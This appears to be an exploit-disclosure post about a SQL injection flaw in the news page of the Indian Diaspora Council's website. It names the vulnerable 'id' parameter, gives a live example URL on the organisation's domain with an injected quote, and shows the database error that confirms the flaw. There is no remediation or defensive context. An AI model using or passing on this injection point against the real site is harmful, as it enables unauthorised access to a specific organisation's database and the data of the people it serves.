# Exploit Title:indian diaspora council SQLi # Date: 10 Sep 2019 # Author: H.BBF3.4 & A.BBF3.4 +++++++++++++++++++++++++ About Indian Diaspora Council Indian Diaspora Council is global non-profit organization established September 3, 1997 with the objective to embrace, engage and enhance the shared heritage, aspirations and interests of persons of Indian origin with optimum inclusivity. It shall be secular and non-political with a centrally located secretariat and global country wise network of chapters and affiliates, and collaborating with governments, institutions, organizations and agencies to achieve its objectives. ++++++++++++++++++++++++++ # SQL Injection Exploit : ********************** /news.php?id=[SQL Injection] # Example Vulnerable Sites : ************************* [+] http://www.indiandiasporacouncil.org/news.php?id=9%27 # Example SQL Database Error : **************************** Could not get data: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0, 10' at line 1